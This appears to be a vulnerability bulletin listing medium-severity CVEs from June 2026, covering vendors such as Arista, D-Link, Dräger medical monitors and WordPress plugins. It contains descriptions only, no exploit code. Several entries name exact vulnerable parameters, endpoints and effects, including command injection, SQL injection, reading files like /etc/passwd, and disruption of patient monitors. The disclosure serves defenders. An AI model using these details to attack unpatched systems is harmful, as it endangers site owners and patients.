| Arista Networks--Arista Edge Threat Management - Arista Next Generation Firewall (NGFW) | An encrypted password command injection vulnerability exists in the Captive Portal application framework of Arista Edge Threat Management - Arista Next Generation Firewall (NGFW). This issue uniquely affects version 17.4.0; earlier software releases are not exposed. | 2026-06-05 | 6 | CVE-2026-25620 |
| Arista Networks--Arista Edge Threat Management - Arista Next Generation Firewall (NGFW) | A Reports application infrastructure vulnerability exists in Arista Edge Threat Management - Arista Next Generation Firewall (NGFW) due to insecure input validation. This issue uniquely affects version 17.4.0; earlier software releases are not exposed. | 2026-06-05 | 6 | CVE-2026-25621 |
| Arista Networks--Arista Edge Threat Management - Arista Next Generation Firewall (NGFW) | A Captive Portal Custom Handler command injection vulnerability exists in Arista Edge Threat Management - Arista Next Generation Firewall (NGFW). On affected platforms, an administrative account logged into the user interface can exploit this input handling behavior to execute arbitrary platform shell commands. | 2026-06-05 | 6 | CVE-2026-25622 |
| Arista Networks--Arista Edge Threat Management - Arista Next Generation Firewall (NGFW) | An input validation command execution vulnerability exists in the browser management pipeline of Arista Edge Threat Management - Arista Next Generation Firewall (NGFW). Authenticated administrators can leverage this exposure to obtain underlying terminal script code processing execution permissions. | 2026-06-05 | 6 | CVE-2026-25623 |
| Arista Networks--Arista Edge Threat Management - Arista Next Generation Firewall (NGFW) | An administrative cross-site scripting (XSS) vulnerability exists in the web user interface dashboard layout of Arista Edge Threat Management - Arista Next Generation Firewall (NGFW). Unvalidated user-supplied variables are echoed back to administrative profiles, facilitating vector payload processing behavior controls. | 2026-06-05 | 5.7 | CVE-2026-25624 |
| Arista Networks--EOS | On affected platforms running Arista EOS with 802.1x authentication configured on the access/trunk ports, and routing enabled on the access VLAN of the ports, a malicious supplicant may be able to bypass the requirement to perform 802.1x authentication. | 2026-06-04 | 5.9 | CVE-2023-5502 |
| Arista Networks--EOS | On affected platforms running Arista EOS with MACsec and egress ACLs configured on the same interfaces, the ACL policies may not be enforced for packets egressing on those ports. This can cause outgoing packets to incorrectly be allowed or denied. | 2026-06-04 | 5.3 | CVE-2024-27891 |
| Arista Networks--EOS | On affected platforms with hardware IPSec support running Arista EOS with certain IPsec features enabled, EOS may exhibit unexpected behavior in specific cases. Physical interface flaps and certain agent restarts can cause IPsec tunnel re-establishment with existing Security Associations, resulting in sequence number mismatches between tunnel endpoints potentially causing unstable communication. | 2026-06-05 | 5.9 | CVE-2026-2379 |
| Arista Networks--EOS | On affected platforms running Arista EOS where a tunnel decapsulation configuration, such as VXLAN (Virtual Extensible LAN), decap-groups, or a GRE (Generic Routing Encapsulation) tunnel interface, is present, the switch will incorrectly decapsulate and forward other unexpected tunneled packets with a destination IP matching its configured decapsulation IP. This occurs because the switch does not verify the tunnel protocol type, potentially leading to the unexpected processing of non-configured tunnel traffic. This issue has been reported as being exploited in the wild. | 2026-06-05 | 5.8 | CVE-2026-7473 |
| Arista Networks--EOS / CloudVision eXchange (CVX) | In a CVX cluster, an EOS switch connected to a CVX server is not resilient to certain malformed messages received from the connected CVX server. Similarly, the CVX server is not resilient to certain malformed messages received from the connected EOS switch. This leads to either a Sysdb agent crash on the EOS device causing a soft reset of the switch or agent crashes on the CVX server causing instability of the CVX cluster. An attacker could use this behavior to create a denial of service (DoS) scenario. Note that this would require the attacker to already have a high privilege access to the connected device to be able to send custom TCP packets. EOS switches that are not connected to a CVX server are not impacted. | 2026-06-05 | 6.5 | CVE-2025-5089 |
| Arista Networks--EOS / CloudVision eXchange (CVX) | CVX is not resilient to unexpected messages from a connected switch. This leads to agent crashes on CVX causing instability in the CVX cluster. An attacker could use this behavior to create a denial of service (DoS) scenario. Note that this would require the attacker to have a high privilege access to the connected switch to be able to send custom TCP packets to the CVX. | 2026-06-05 | 6.5 | CVE-2025-5090 |
| ariyes--WP Nano AD | The WP Nano AD plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'blogrole_link' parameter in all versions up to, and including, 1.31 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level access, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled. | 2026-06-02 | 5.5 | CVE-2025-5085 |
| armember--ARMember Premium Membership Plugin, Content Restriction, Member Levels, User Profile & User signup | The ARMember Premium plugin for WordPress is vulnerable to SQL Injection via the 'sSortDir_0' parameter of the `get_private_content_data` AJAX action in all versions up to, and including, 7.3.1. This is due to insufficient sanitization of the user-supplied parameter which is concatenated directly into the ORDER BY clause of an SQL query without a whitelist check. This makes it possible for authenticated attackers, with Subscriber-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. Note: The vulnerability can only be exploited if the "User Private Content" addon is enabled, which is disabled by default. | 2026-06-02 | 6.5 | CVE-2026-5074 |
| arunbasillal--Auto Image Attributes From Filename With Bulk Updater (Add Alt Text, Image Title For Image SEO) | The Auto Image Attributes From Filename With Bulk Updater (Add Alt Text, Image Title For Image SEO) plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the attachment metadata in all versions up to, and including, 4.9 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-06-02 | 6.4 | CVE-2026-3722 |
| Assimp--Assimp | A vulnerability was determined in Assimp up to 6.0.4. This affects the function HL1MDLLoader::read_meshes of the file HL1MDLLoader.cpp of the component Half-Life 1 MDL Loader. This manipulation causes heap-based buffer overflow. The attack is restricted to local execution. The exploit has been publicly disclosed and may be utilized. The project tagged the reported issue as bug. | 2026-06-01 | 5.3 | CVE-2026-10229 |
| Assimp--Assimp | A vulnerability was identified in Assimp up to 6.0.4. This impacts the function Assimp::MDL::HalfLife::HL1MDLLoader::read_animations of the file HL1MDLLoader.cpp of the component Half-Life 1 MDL Loader. Such manipulation leads to heap-based buffer overflow. The attack must be carried out locally. The exploit is publicly available and might be used. The project tagged the reported issue as bug. | 2026-06-01 | 5.3 | CVE-2026-10230 |
| Assimp--Assimp | A security flaw has been discovered in Assimp up to 6.0.4. Affected is the function HL1MDLLoader::extract_anim_value of the file HL1MDLLoader.cpp of the component Half-Life 1 MDL Loader. Performing a manipulation of the argument num.total results in heap-based buffer overflow. The attack must be initiated from a local position. The exploit has been released to the public and may be used for attacks. The project tagged the reported issue as bug. | 2026-06-01 | 5.3 | CVE-2026-10231 |
| Assimp--Assimp | A weakness has been identified in Assimp up to 6.0.4. Affected by this vulnerability is the function aiNode::~aiNode of the file scene.cpp of the component ASE File Parser. Executing a manipulation can lead to use after free. The attack needs to be launched locally. The exploit has been made available to the public and could be used for attacks. The project tagged the reported issue as bug. | 2026-06-01 | 5.3 | CVE-2026-10232 |
| AstrBotDevs--AstrBot | A vulnerability was found in AstrBotDevs AstrBot 4.23.6. Affected by this vulnerability is the function _sanitize_prompt_description of the file astrbot/core/skills/skill_manager.py. The manipulation results in injection. The attack may be performed from remote. The exploit has been made public and could be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-06-01 | 6.3 | CVE-2026-10210 |
| AstrBotDevs--AstrBot | A vulnerability was determined in AstrBotDevs AstrBot 4.23.6. Affected by this issue is the function _normalize_rw_path of the file astrbot/core/tools/computer_tools/fs.py. This manipulation causes incorrect authorization. It is possible to initiate the attack remotely. The exploit has been publicly disclosed and may be utilized. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-06-01 | 6.3 | CVE-2026-10211 |
| AstrBotDevs--AstrBot | A vulnerability was identified in AstrBotDevs AstrBot 4.24.2. This affects the function astr_main_agent of the file astrbot/core/astr_main_agent.py. Such manipulation of the argument session_id leads to authorization bypass. It is possible to launch the attack remotely. The exploit is publicly available and might be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-06-01 | 6.3 | CVE-2026-10212 |
| AstrBotDevs--AstrBot | A security flaw has been discovered in AstrBotDevs AstrBot 4.23.6. This vulnerability affects unknown code of the file /api/skills/delete of the component API Endpoint. Performing a manipulation of the argument Name results in path traversal. The attack can be initiated remotely. The exploit has been released to the public and may be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-06-01 | 5.4 | CVE-2026-10213 |
| awordpresslife--Event Monster Event Manager, Ticket Booking & Registration | The Event Monster - Event Management, Events Calendar, Tickets plugin for WordPress is vulnerable to Insufficient Verification of Data Authenticity in versions up to, and including, 2.1.0. This is due to the capture_payment() AJAX handler (registered via wp_ajax_nopriv_em_capture_payment) trusting client-supplied payment data - including transaction ID, amount, and payment status - without performing any server-side verification against the PayPal API or any other payment gateway, and without nonce or capability checks. This makes it possible for unauthenticated attackers to forge payment records, mark bookings as Completed, and obtain confirmation emails containing valid QR code tickets without making any actual payment. | 2026-06-05 | 5.3 | CVE-2026-8608 |
| AWS--Graph Explorer | Proxy server in Graph Explorer before 3.0.1 falls back to HTTP when certificate files are missing, which might allow remote threat actors to obtain sensitive information via interception of requests intended to be sent over HTTPS. To remediate this issue, users should upgrade to Graph Explorer v3.0.1 or later. | 2026-06-02 | 5.9 | CVE-2026-10584 |
| birdseedapp--BirdSeed | The BirdSeed plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.2.0. This is due to missing nonce validation in the birdseed_plugin_settings_page() function. The function processes the 'birdseed_token' GET parameter and saves it to the database via update_option() without verifying a nonce. This makes it possible for unauthenticated attackers to change the plugin's BirdSeed token setting via a forged request, granted they can trick a site administrator into performing an action such as clicking a link. | 2026-06-02 | 4.3 | CVE-2026-4071 |
| Bottelet--DaybydayCRM | A vulnerability was detected in Bottelet DaybydayCRM up to 2.2.1. Affected is an unknown function of the component Setting Handler. Performing a manipulation results in missing authentication. Remote exploitation of the attack is possible. It is recommended to apply a patch to fix this issue. | 2026-06-01 | 6.3 | CVE-2026-10283 |
| Bottelet--DaybydayCRM | A security vulnerability has been detected in Bottelet DaybydayCRM up to 2.2.1. This impacts the function view of the file app/Http/Controllers/DocumentsController.php. Such manipulation leads to improper authorization. The attack may be launched remotely. It is best practice to apply a patch to resolve this issue. | 2026-06-01 | 4.3 | CVE-2026-10282 |
| browserstack--browserstack-runner | BrowserStack Runner through 0.9.5 contains a path traversal vulnerability in the _default HTTP handler in lib/server.js that allows unauthenticated network-adjacent attackers to read arbitrary files. Attackers can exploit the unauthenticated HTTP server bound on all interfaces to traverse outside the project root and access sensitive files. | 2026-06-02 | 6.5 | CVE-2026-49144 |
| chrisvrichardson--MapPress Maps for WordPress | The MapPress Maps for WordPress plugin for WordPress is vulnerable to Authorization Bypass Through User-Controlled Key in all versions up to, and including, 2.96.6. This is due to missing ownership verification in the REST API routes registered via `Mappress_Api::rest_api_init()`, where the GET `/wp-json/mapp/v1/maps/{mapid}` endpoint uses `'permission_callback' => '__return_true'` and the write endpoints (POST update, DELETE, PATCH mutate, POST clone, POST empty_trash) only check the generic `edit_posts` capability without confirming that the requester owns the targeted map - a gap that is not compensated at the model layer, as `Mappress_Map::get()`, `save()`, `delete()`, `mutate()`, and `empty_trash()` all operate on any caller-supplied map ID without an ownership check. This makes it possible for unauthenticated attackers to read sensitive map data - including POI titles, addresses, coordinates, and body content - for any map on the site by enumerating map IDs, and for authenticated attackers with Contributor-level access and above to modify, delete, trash/restore, or clone any map regardless of its author. | 2026-06-06 | 5.3 | CVE-2026-8839 |
| cifi--SEO Plugin by Squirrly SEO | The SEO Plugin by Squirrly SEO plugin for WordPress is vulnerable to authorization bypass in all versions up to, and including, 12.4.16. This is due to the plugin not properly verifying that a user is authorized to perform an action. This makes it possible for authenticated attackers, with contributor-level access and above, to invoke privileged state-changing Squirrly cloud API operations, such as revoking the site's Google Search Console and Google Analytics integrations via `api/gsc/revoke` and `api/ga/revoke`, that are otherwise restricted to administrator-level users holding the `sq_manage_settings` capability. | 2026-06-06 | 4.3 | CVE-2026-7624 |
| Cisco--Cisco Finesse | A vulnerability in Cisco Finesse could allow an unauthenticated, remote attacker to load arbitrary files from remote locations into an active user session on an affected device, possibly leading to browser-based attacks. This vulnerability is due to insufficient validation of user-supplied input for HTTP requests that are sent to an affected device. An attacker who has knowledge of the address of the affected device could exploit this vulnerability by persuading a user to click a crafted link that contains the affected device address. A successful exploit could allow the attacker to conduct browser-based attacks and execute arbitrary script code in the context of the affected interface or access sensitive information on the affected device. | 2026-06-03 | 6.1 | CVE-2026-20175 |
| Cisco--Cisco Webex Meetings | A vulnerability in the web-based user interface of Cisco Webex Meetings could have allowed an unauthenticated, remote attacker to conduct a cross-site scripting (XSS) attack. Cisco has addressed this vulnerability in the Webex Meetings service, and no customer action is needed. This vulnerability existed because of insufficient validation of user input. Prior to this vulnerability being addressed, an attacker could have exploited this vulnerability by persuading a user to follow a malicious link. A successful exploit could have allowed the attacker to execute arbitrary script code in the browser of the targeted user or access sensitive, browser-based information. | 2026-06-03 | 6.1 | CVE-2026-20233 |
| Cloud Foundry Foundation--windows-utilities-release | Weak Randomness / Insecure Cryptographic Primitive (CWE-338) in Get-RandomPassword in BOSH-Ecosystem / windows-utilities-release allows a network attacker to estimate VM boot time and reconstruct a small candidate list to recover the Administrator password. The randomize_password job exists solely to lock the local Administrator account behind an unguessable password as a hardening control. Because the password is derived from a predictable, clock-seeded PRNG, a network attacker who can estimate VM boot time can reconstruct a small candidate list and recover the Administrator password, defeating the hardening control. Affected versions: windows-utilities-release, all versions prior to v0.23.0 (inclusive); fixed in v0.23.0 or later. | 2026-06-04 | 6.5 | CVE-2026-41858 |
| CloudburstMC--Protocol | CloudburstMC Protocol is a protocol library for Minecraft Bedrock Edition. Prior to version 3.0.0.Beta12-20260420.182526-15, CloudburstMC Protocol is partially missing validation for FULL type authentication tokens (Cloudburst/Protocol). This vulnerability impacts publicly accessible software depending on the affected versions of Protocol, specifically the EncryptionUtils methods to validate auth payloads for FULL type tokens. This issue has been patched in version 3.0.0.Beta12-20260420.182526-15. | 2026-06-02 | 5.3 | CVE-2026-45289 |
| code-projects--Hotel and Tourism Reservation System | A security flaw has been discovered in code-projects Hotel and Tourism Reservation System 1.0. Impacted is an unknown function of the file /ht/tour.php. Performing a manipulation of the arguments name, email, people or number results in cross site scripting. The attack can be initiated remotely. The exploit has been released to the public and may be used for attacks. | 2026-06-01 | 4.3 | CVE-2026-10289 |
| code-projects--Online Hospital Management System | A vulnerability has been found in code-projects Online Hospital Management System 1.0. Affected is an unknown function of the file appointmentdetail.php of the component Appointment Handler. The manipulation of the argument editid leads to sql injection. The attack is possible to be carried out remotely. The exploit has been disclosed to the public and may be used. | 2026-06-01 | 6.3 | CVE-2026-10209 |
| CodeAstro--Ingredients Stock Management System | A flaw has been found in CodeAstro Ingredients Stock Management System 1.0. This vulnerability affects unknown code of the file /Ingredients-Stock/stock_manager.php. This manipulation of the argument txt_search_category causes sql injection. The attack may be initiated remotely. The exploit has been published and may be used. | 2026-06-01 | 6.3 | CVE-2026-10235 |
| CodeAstro--Payroll System | A vulnerability was found in CodeAstro Payroll System 1.0. This affects an unknown part of the file /home_employee.php. The manipulation of the argument emp_id results in sql injection. The attack may be performed from remote. The exploit has been made public and could be used. | 2026-06-01 | 6.3 | CVE-2026-10286 |
| crafium--OptinCraft Drag & Drop Optins & Popup Builder for WordPress | The OptinCraft - Drag & Drop Optins & Popup Builder for WordPress plugin for WordPress is vulnerable to generic SQL Injection via the 'order_by' parameter in all versions up to, and including, 1.2.0 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with administrator-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. | 2026-06-06 | 4.9 | CVE-2026-8978 |
| D-Link--DWR-M920 | A vulnerability was detected in D-Link DWR-M920 1.1.50/1.1.70. Affected is the function sub_41C8E8 of the file /boafrm/formSmsManage. Performing a manipulation of the argument action_value results in command injection. The attack is possible to be carried out remotely. The exploit is now public and may be used. | 2026-06-05 | 6.3 | CVE-2026-10878 |
| D-Link--DWR-M920 | A vulnerability was detected in D-Link DWR-M920 up to 1.1.50. The affected element is the function sub_41CF20 of the file /boafrm/formUSSDSetup. The manipulation of the argument ussdValue results in command injection. It is possible to launch the attack remotely. The exploit is now public and may be used. | 2026-06-05 | 6.3 | CVE-2026-11339 |
| D-Link--DWR-M920 | A flaw has been found in D-Link DWR-M920 up to 1.1.50. The impacted element is the function sub_412DA0 of the file /boafrm/formIMEISetup. This manipulation of the argument IMEI_value causes os command injection. The attack can be initiated remotely. The exploit has been published and may be used. | 2026-06-05 | 6.3 | CVE-2026-11341 |
| danny-avila--LibreChat | LibreChat is an enhanced ChatGPT clone that supports multiple AI providers. In versions up to and including 0.8.3, users with only `VIEW` access to an MCP server can retrieve the server's decrypted admin-managed secrets through `GET /api/mcp/servers` and `GET /api/mcp/servers/:serverName`. The returned config includes plaintext values for `apiKey.key` and `oauth.client_secret`. This allows viewers of a shared MCP server to exfiltrate the underlying provider credentials. Version 0.8.4 contains a patch. Other remediations include: never returning decrypted admin-managed secrets to non-owners; redacting `apiKey.key` and `oauth.client_secret` from all API responses, and considering returning only boolean presence indicators for secrets, similar to the auth-values route pattern; and, if owners need to edit configs without re-entering secrets, preserving secrets server-side and returning placeholders instead of plaintext. | 2026-06-02 | 6.5 | CVE-2026-44653 |
| davidfcarr--Quick Playground | The Quick Playground plugin for WordPress is vulnerable to Path Traversal in all versions up to, and including, 1.3.4. This is due to the `qckply_data()` function passing the user-supplied `filename` POST parameter directly to `file_get_contents()` without any validation, sanitization, or path restriction. This makes it possible for authenticated attackers, with Administrator-level access and above, to read arbitrary files on the server, such as `wp-config.php` or `/etc/passwd`, which can contain sensitive information. Note: This vulnerability is only exploitable when the site has been synced with WordPress Playground (the `is_qckply_clone` option is set) or when running on `playground.wordpress.net`. | 2026-06-06 | 4.4 | CVE-2026-2500 |
| ddd2500--Google Plus One Bottom | The Google Plus One Bottom plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 0.0.2. This is due to missing or incorrect nonce validation on the googlePlusOneAdmin function. This makes it possible for unauthenticated attackers to modify the plugin's settings, including the plusone-lang, plusone-callback, and plusone-url options stored in the database via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2026-06-02 | 4.3 | CVE-2026-9723 |
| decolua--9router | A security vulnerability has been detected in decolua 9router up to 0.4.0. This issue affects the function isAuthenticated of the file src/dashboardGuard.js of the component HTTP Header Handler. The manipulation of the argument Host leads to improper authorization. The attack is possible to be carried out remotely. Upgrading to version 0.4.1 is capable of addressing this issue. The identifier of the patch is 428e2c045cb9c0eb8080e8b580471a9c2eaa95ca. Upgrading the affected component is recommended. | 2026-06-01 | 6.3 | CVE-2026-10269 |
| decompress--decompress | All versions of the package decompress are vulnerable to Arbitrary File Write via Archive Extraction (Zip Slip) when extracting a ZIP archive containing two entries with the same path, the first being a symlink to an arbitrary target and the second being a regular file: the file content is written through the symlink to the target location outside the output directory. This is due to the microtask processing order, which checks readlink for the second file before resolving the symlink for the first file. An attacker can write an arbitrary file on the host filesystem, potentially leading to remote code execution, by providing a specially crafted ZIP archive. **Note:** This bypasses all existing path traversal protections, including preventWritingThroughSymlink, added as part of the fix for [CVE-2020-12265](https://security.snyk.io/vuln/SNYK-JS-DECOMPRESS-557358). | 2026-06-05 | 6.4 | CVE-2026-10732 |
| DedeCMS--DedeCMS | A flaw has been found in DedeCMS 5.7.88. Affected by this vulnerability is the function base64_decode of the file /plus/download.php?open=1. This manipulation of the argument Link causes server-side request forgery. Remote exploitation of the attack is possible. The exploit has been published and may be used. | 2026-06-02 | 6.3 | CVE-2026-10581 |
| DeepAI--api.deepai.org | The DeepAI endpoint 'https://api.deepai.org/change_user_email' accepts POST requests without any CSRF protection. If an attacker can trick a logged-in user into clicking a malicious link, the attacker can change the user's email address and take over their account. Fixed on 2026-05-20. | 2026-06-01 | 5 | CVE-2026-49433 |
| Dell--ThinOS 10 | Dell ThinOS 10, versions prior to ThinOS10 2602_10.0765, contain an Improper Access control vulnerability. An unauthenticated attacker with physical access could potentially exploit this vulnerability, leading to Information exposure. | 2026-06-02 | 6.1 | CVE-2026-40713 |
| den-media--hiWeb Migration Simple | The hiWeb Migration Simple plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'new_domain' parameter in all versions up to, and including, 2.0.0.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick an administrator into performing an action such as clicking on a link. | 2026-06-02 | 6.1 | CVE-2026-2425 |
| DevaslanPHP--project-management | A flaw has been found in DevaslanPHP project-management up to 2.0.0-beta1. Affected by this vulnerability is the function editComment/doDeleteComment of the file app/Filament/Resources/TicketResource/Pages/ViewTicket.php of the component Livewire Handler. Executing a manipulation can lead to improper authorization. The attack can be executed remotely. The project was informed of the problem early through an issue report but has not responded yet. | 2026-06-01 | 5.4 | CVE-2026-10284 |
| DevaslanPHP--project-management | A vulnerability has been found in DevaslanPHP project-management up to 2.0.0-beta1. Affected by this issue is the function KanbanScrumHelper::recordUpdated of the file app/Helpers/KanbanScrumHelper.php of the component Ticket Handler. The manipulation leads to improper authorization. The attack is possible to be carried out remotely. The project was informed of the problem early through an issue report but has not responded yet. | 2026-06-01 | 5.4 | CVE-2026-10285 |
| dfir-iris--iris-web | IRIS is a web collaborative platform that helps incident responders share technical details during investigations. Versions prior to 2.4.28 do not properly validate uploaded files. The application can therefore be misused to host phishing pages, amongst other things. This also creates another instance of a Cross-Site Scripting (XSS) vulnerability. Version 2.4.28 contains a patch. | 2026-06-04 | 6.3 | CVE-2026-42538 |
| dfir-iris--iris-web | IRIS is a web collaborative platform that helps incident responders share technical details during investigations. Versions prior to 2.4.28 return sensitive data to the user which are not required for the client's operation. Version 2.4.28 contains a patch. | 2026-06-04 | 6.5 | CVE-2026-42539 |
| dfir-iris--iris-web | IRIS is a web collaborative platform that helps incident responders share technical details during investigations. In versions prior to 2.4.28, users can create alerts for customers that are not assigned to them. This can be abused to falsely attribute fake alerts to customers. In combination with Cross-Site Scripting, this can also be used to exfiltrate alerts from other customers. Version 2.4.28 contains a patch. | 2026-06-04 | 5.4 | CVE-2026-42547 |
| dfir-iris--iris-web | Iris is a web collaborative platform that helps incident responders share technical details during investigations. Versions prior to 2.4.28 contain a weakness where an attacker can misuse it to redirect the user to a malicious website controlled by an attacker. Version 2.4.28 fixes the issue. | 2026-06-04 | 4.7 | CVE-2026-42329 |
| dfir-iris--iris-web | IRIS is a web collaborative platform that helps incident responders share technical details during investigations. Versions prior to 2.4.28 allow a user to alter values in the database via manipulated API requests. Version 2.4.28 contains a patch. | 2026-06-04 | 4.3 | CVE-2026-42540 |
| dfir-iris--iris-web | IRIS is a web collaborative platform that helps incident responders share technical details during investigations. Versions prior to 2.4.28 are vulnerable to a cross-site request forgery attack, because they use the HTTP method `GET` to change state on the server. Version 2.4.28 contains a patch. | 2026-06-04 | 4.3 | CVE-2026-42543 |
| Ditec a.s.--D.Launcher 2 | The D.Launcher 2 component of the Slovak eID client ecosystem contains an Improper URL Handler Processing vulnerability. The application registers multiple custom URL handlers that could be exploited to initiate full NTLM authentication or an SMB connection to attacker infrastructure and to conduct SSRF (Server Side Request Forgery) attacks. User interaction is required, as the potential victim needs to open a specially crafted URL. | 2026-06-02 | 6.5 | CVE-2026-8993 |
| djangoproject--daphne | daphne before 4.2.2 did not pass maxFramePayloadSize or maxMessagePayloadSize to Autobahn's WebSocketServerFactory. Because Autobahn defaults both values to 0 (unlimited), an unauthenticated remote attacker could send arbitrarily large WebSocket messages or frames, causing excessive memory consumption and a denial of service. | 2026-06-03 | 5.3 | CVE-2026-44545 |
| Dolibarr--ERP CRM | A security vulnerability has been detected in Dolibarr ERP CRM up to 23.0.1. Impacted is the function checkUserAccessToObject of the file htdocs/holiday/class/api_holidays.class.php of the component Leave Request REST API. The manipulation leads to improper authorization. The attack may be initiated remotely. The exploit has been disclosed publicly and may be used. Upgrading to version 23.0.2 is recommended to address this issue. The identifier of the patch is ee93b6f2f9dd0f6aeefe9d718ab3ab0a44326b73. Upgrading the affected component is advised. | 2026-06-01 | 4.3 | CVE-2026-10215 |
| Dräger--Atlan A350 | Dräger Atlan A350 software versions 1.00 through 1.01 contain an improper input handling vulnerability that allows attackers to cause a denial of service by sending specifically crafted non-Medibus-compliant data through the Medibus interface. Attackers can transmit malformed data to overload the internal processor, gradually disrupting device operation over several hours and causing loss of data transmission, delayed display of real-time curves, and deviation between displayed airway pressure values and screen curves. | 2026-06-02 | 4 | CVE-2021-4479 |
| Dräger--Infinity Delta | Dräger Infinity Delta, Delta XL, and Kappa patient monitors contain a denial-of-service vulnerability that allows remote attackers to cause the monitor to reboot by sending a malformed network packet. Attackers can repeatedly send malformed network packets to disrupt patient monitoring until the device falls back to default configuration and loses network connectivity. | 2026-06-01 | 6.5 | CVE-2019-25716 |
| Dräger--Infinity Delta | Dräger Infinity Delta, Delta XL, and Kappa patient monitors contain an information disclosure vulnerability that allows unauthenticated network attackers to access log files over a network connection. Attackers can retrieve device internals, location information, and wired network configuration details from the exposed log files. | 2026-06-02 | 4.3 | CVE-2019-25717 |
| Dräger--Infinity M300 | Dräger Infinity M300 patient-worn monitors with software version VG2.3.1 and earlier contain a network-based denial of service vulnerability that allows network-adjacent attackers to repeatedly trigger device reboots by sending malicious requests over the Infinity Network. Attackers can exploit this vulnerability to force the device into a fail state requiring manual restart, causing loss of wireless connectivity and interruption of patient monitoring functionality. | 2026-06-02 | 6.5 | CVE-2019-25721 |
| Dräger--Infinity M300 | Dräger Infinity M300 patient-worn monitors with software version VG2.x and earlier contain a network-based denial of service vulnerability that allows attackers with access to the hospital or Infinity Network to repeatedly trigger device reboots until the device enters a fail state requiring manual restart. Attackers can exploit this vulnerability to cause loss of wireless network connectivity, temporary loss of patient monitoring, and interruption of alarm functionality until the device is manually recovered. | 2026-06-02 | 6.5 | CVE-2019-25724 |
| Dräger--Perseus A500 | Dräger Perseus A500 software versions 2.00 through 2.02 contain an improper input handling vulnerability that allows external attackers to cause a denial of service by sending specifically crafted non-Medibus-compliant data through the Medibus interface. Attackers can overload the internal processor with malformed data to trigger a warm restart, causing ventilation pressure to drop to ambient level and interrupting ventilation for several seconds before therapy resumes. | 2026-06-02 | 4 | CVE-2019-25723 |
| Dräger--SC 6002XL | Dräger SC Monitoring devices (SC 6002XL, SC 6802XL, SC 7000, SC 8000, SC 9000 XL) contain a denial-of-service vulnerability in all software versions that allows unauthenticated attackers to reboot the monitor by sending a malformed network packet. Attackers can repeatedly send such malformed packets to disrupt patient monitoring until the device falls back to default configuration and loses network connectivity. | 2026-06-03 | 6.5 | CVE-2019-25720 |
| Dräger--Zeus IE | Dräger Zeus Infinity Empowered (Zeus IE) and Zeus RS C500 anesthesia workstations contain a local security vulnerability that allows unauthorized individuals with physical access to compromise software integrity via USB interface manipulation. Attackers can exploit the unprotected USB interfaces to impair therapy functions, manipulate device-processed data, or leverage the device as a pivot point for broader network-based attacks when connected to a network or Dräger Service Connect. | 2026-06-02 | 6.8 | CVE-2025-15653 |
| EIPStackGroup--OpENer | A security vulnerability has been detected in EIPStackGroup OpENer up to 2.3.0. Affected is the function CreateMessageRouterRequestStructure of the file cipmessagerouter.c of the component SendRRData Handler. The manipulation leads to use after free. Remote exploitation of the attack is possible. The exploit has been disclosed publicly and may be used. The project was informed of the problem early through an issue report but has not responded yet. | 2026-06-03 | 6.3 | CVE-2026-10703 |
| elabftw--elabftw | eLabFTW is an open source electronic lab notebook. Prior to version 5.4.2, in certain cases, an authenticated user performing a numeric reference/search can return results that include resources the requesting user is not authorized to view. The exposed information is limited (only the title). Attempts to access the underlying protected resource content remain blocked by authorization checks. Version 5.4.2 fixes the issue. Affected scope: cross-scope visibility of titles; no confirmed bypass of content-level access controls. Preconditions: an authenticated user account; no special privileges required beyond standard access. Impact: this may enable unauthorized disclosure of sensitive information if confidential data is included in resource titles. Examples could include project names, patient identifiers, or other regulated information embedded in titles. | 2026-06-01 | 4.3 | CVE-2026-28511 |
| Elementor--Elementor Website Builder | Missing Authorization vulnerability in Elementor Elementor Website Builder allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Elementor Website Builder: from n/a through 4.1.0. | 2026-06-02 | 5.4 | CVE-2026-49782 |
| elunez--eladmin | A weakness has been identified in elunez eladmin up to 2.7. This vulnerability affects unknown code of the file App.java of the component Application Deployment Module. This manipulation of the argument uploadPath causes command injection. Remote exploitation of the attack is possible. The exploit has been made available to the public and could be used for attacks. The project was informed of the problem early through an issue report but has not responded yet. | 2026-06-02 | 6.3 | CVE-2026-10550 |
| Emilia Projects--Progress Planner | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Emilia Projects Progress Planner allows Stored XSS. This issue affects Progress Planner: from n/a through 1.9.0. | 2026-06-02 | 5.9 | CVE-2026-28116 |
| Enderfga--claw-orchestrator | A security vulnerability has been detected in Enderfga claw-orchestrator up to 3.7.0. The impacted element is the function validateRegex of the file claw-orchestrator/src/embedded-server.ts of the component Session Grep Endpoint. The manipulation of the argument body.pattern leads to inefficient regular expression complexity. The attack may be initiated remotely. Upgrading to version 3.7.1 is sufficient to resolve this issue. The identifier of the patch is 3f970a974c65a94555c25af9f2796f11315e4584. It is recommended to upgrade the affected component. | 2026-06-01 | 4.3 | CVE-2026-10291 |
| epoupon--lms | Lightweight Music Server (LMS) through 3.76.0 contains a stored cross-site scripting vulnerability that allows attackers to execute arbitrary JavaScript by embedding malicious HTML in media file metadata tags such as GENRE, ARTIST, or ALBUM. Attackers can introduce a crafted media file into the victim's library, causing the payload to be saved during library scanning and executed automatically in the web interface due to tag content being rendered using Wt::TextFormat::UnsafeXHTML without sanitization in src/lms/ui/Utils.cpp. | 2026-06-01 | 5.4 | CVE-2026-48559 |
